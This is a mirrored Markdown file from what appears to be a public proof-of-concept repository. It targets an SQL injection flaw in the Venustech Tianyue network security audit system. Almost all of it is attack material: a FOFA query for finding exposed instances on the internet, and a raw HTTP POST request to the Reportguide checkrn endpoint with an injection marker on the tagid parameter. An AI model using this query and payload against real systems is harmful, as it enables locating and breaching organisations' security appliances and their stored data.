mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
26 lines
631 B
Markdown
26 lines
631 B
Markdown
|
|
# 启明星辰天玥网络安全审计系统SQL注入漏洞
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
app="启明星辰-天玥网络安全审计"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
|
||
|
|
Host xxx
|
||
|
|
User-Agent: Mozilla/5.0(Macintosh;Intel Mac OS X 10.15;rv:88.0) Gecko/20100101 Firefox/88.0
|
||
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3en;q=0.2
|
||
|
|
Accept-Encoding: gzip,deflate
|
||
|
|
Upgrade-Insecure-Requests: 1
|
||
|
|
Connection: close
|
||
|
|
Content-Type: application/x-www-from-urlencoded
|
||
|
|
Content-Length: 23
|
||
|
|
|
||
|
|
checkname=123&tagid=123*
|
||
|
|
```
|
||
|
|
|